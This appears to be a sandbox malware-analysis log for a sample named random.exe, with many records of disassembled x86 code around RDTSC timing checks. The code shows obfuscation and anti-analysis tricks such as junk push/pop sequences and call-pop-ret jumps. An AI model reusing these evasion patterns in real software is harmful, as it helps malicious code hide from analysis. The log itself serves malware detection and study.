            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E03429 second address: E0344A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F887475ED96h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f jmp 00007F887475EDA0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E01475 second address: E0151A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8874D4CC95h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, bx 0x00000012 mov dword ptr [ebp+12464E19h], edx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f or di, ECCBh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b or dword ptr [ebp+122D1D85h], esi 0x00000031 mov eax, dword ptr [ebp+122D0E09h] 0x00000037 mov edi, dword ptr [ebp+122D304Ch] 0x0000003d push FFFFFFFFh 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F8874D4CC88h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xor dword ptr [ebp+122D315Bh], edx 0x0000005f nop 0x00000060 jmp 00007F8874D4CC99h 0x00000065 push eax 0x00000066 jo 00007F8874D4CC9Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8874D4CC8Eh 0x00000073 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E03A2E second address: E03A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E03A47 second address: E03ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F8874D4CC88h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 add dword ptr [ebp+122D26D6h], eax 0x0000002a jo 00007F8874D4CC8Bh 0x00000030 xor bx, 97EFh 0x00000035 push 00000000h 0x00000037 mov ebx, 70E59A7Bh 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F8874D4CC88h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d jne 00007F8874D4CC86h 0x00000063 popad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E04AB0 second address: E04AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E06A9F second address: E06AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8874D4CC8Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E06AB2 second address: E06AC3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E07B21 second address: E07B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E07B25 second address: E07B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E07B3F second address: E07BD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F8874D4CC86h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F8874D4CC88h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D59C8h] 0x0000002f xor di, 53EDh 0x00000034 push 00000000h 0x00000036 add ebx, dword ptr [ebp+122D2F0Eh] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F8874D4CC88h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 or dword ptr [ebp+122D266Dh], eax 0x0000005e js 00007F8874D4CC8Bh 0x00000064 and bx, 0B43h 0x00000069 xchg eax, esi 0x0000006a push ecx 0x0000006b push edx 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e pop edx 0x0000006f pop ecx 0x00000070 push eax 0x00000071 jp 00007F8874D4CCB3h 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F8874D4CC90h 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E05C63 second address: E05C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E06C75 second address: E06C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E08CA8 second address: E08CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E08CAD second address: E08CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E08CB3 second address: E08CD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F887475EDA5h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E08CD7 second address: E08CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8874D4CC95h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B547 second address: E0B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0C52F second address: E0C535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B681 second address: E0B685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0C535 second address: E0C53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B685 second address: E0B68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B68B second address: E0B715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and bx, 6E9Eh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jns 00007F8874D4CC89h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F8874D4CC88h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D0DA5h] 0x00000045 call 00007F8874D4CC8Fh 0x0000004a mov ebx, 4C08D1B8h 0x0000004f pop ebx 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edi 0x00000055 call 00007F8874D4CC88h 0x0000005a pop edi 0x0000005b mov dword ptr [esp+04h], edi 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc edi 0x00000068 push edi 0x00000069 ret 0x0000006a pop edi 0x0000006b ret 0x0000006c nop 0x0000006d push edi 0x0000006e push eax 0x0000006f push edx 0x00000070 push edi 0x00000071 pop edi 0x00000072 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B715 second address: E0B739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B739 second address: E0B73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0E447 second address: E0E464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0C78E second address: E0C793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B73D second address: E0B743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0E464 second address: E0E46A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0B743 second address: E0B749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0E46A second address: E0E4EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F8874D4CC88h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+1247EA4Bh], edx 0x0000002c call 00007F8874D4CC8Ah 0x00000031 mov ebx, dword ptr [ebp+122D2C8Eh] 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a mov ebx, dword ptr [ebp+1247EA4Bh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F8874D4CC88h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c mov dword ptr [ebp+122D281Dh], ecx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jne 00007F8874D4CC8Ch 0x0000006b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E0E4EE second address: E0E500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475ED9Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E10BCC second address: E10BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8874D4CC96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E10BE7 second address: E10BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E10BF5 second address: E10BFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1367C second address: E13680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E13680 second address: E136A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F8874D4CC86h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 jmp 00007F8874D4CC8Bh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E136A0 second address: E136C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475EDA9h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F887475ED96h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E14E63 second address: E14E7D instructions: 0x00000000 rdtsc 0x00000002 js 00007F8874D4CC86h 0x00000008 jmp 00007F8874D4CC90h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E18C14 second address: E18C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E18C1A second address: E18C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E18C1F second address: E18C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E18F44 second address: E18F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F8874D4CC8Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E18F60 second address: E18F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6BB second address: E1D6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6BF second address: E1D6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6C9 second address: E1D6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6CD second address: E1D6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6D1 second address: E1D6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8874D4CC99h 0x0000000e jbe 00007F8874D4CC8Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E1D6FB second address: E1D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F887475ED9Ah 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 jp 00007F887475ED9Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E24092 second address: E2409C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2409C second address: E240A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E241F5 second address: E24214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8874D4CC86h 0x0000000a jmp 00007F8874D4CC95h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E24214 second address: E24218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2490D second address: E24927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC96h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E24927 second address: E24940 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 jns 00007F887475ED98h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E24940 second address: E24945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E24945 second address: E2494B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA144 second address: DFA15C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 je 00007F8874D4CC8Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA15C second address: DD801A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 call 00007F887475ED9Ch 0x0000000b mov ecx, dword ptr [ebp+122D2F7Ah] 0x00000011 pop edx 0x00000012 call dword ptr [ebp+122D3B70h] 0x00000018 js 00007F887475EDA0h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA73C second address: DFA75C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8874D4CC98h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA75C second address: DFA760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA87F second address: DFA883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA883 second address: DFA893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 mov dh, E1h 0x0000000a nop 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFA893 second address: DFA897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAFC8 second address: DFAFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB150 second address: DFB155 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB2DF second address: DFB2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB2E3 second address: DFB307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8874D4CC96h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB307 second address: DFB315 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB3AA second address: DFB411 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8874D4CC88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8874D4CC88h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 cmc 0x00000028 lea eax, dword ptr [ebp+12497E68h] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F8874D4CC88h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 mov cx, bx 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F8874D4CC8Ah 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB411 second address: DFB435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F887475EDA2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F887475ED96h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB435 second address: DFB477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 lea eax, dword ptr [ebp+12497E24h] 0x0000000e mov dword ptr [ebp+122D1CF7h], edi 0x00000014 jmp 00007F8874D4CC91h 0x00000019 nop 0x0000001a js 00007F8874D4CC8Ah 0x00000020 push ecx 0x00000021 push edx 0x00000022 pop edx 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8874D4CC8Fh 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB477 second address: DFB47C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFB47C second address: DD8B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jl 00007F8874D4CC88h 0x00000010 mov cl, bl 0x00000012 call dword ptr [ebp+122D3903h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007F8874D4CC86h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DD8B85 second address: DD8B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DD8B89 second address: DD8BC2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jc 00007F8874D4CC86h 0x0000000f pop edi 0x00000010 jns 00007F8874D4CC8Ah 0x00000016 popad 0x00000017 jo 00007F8874D4CCA4h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8874D4CC96h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D3A4 second address: E2D3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
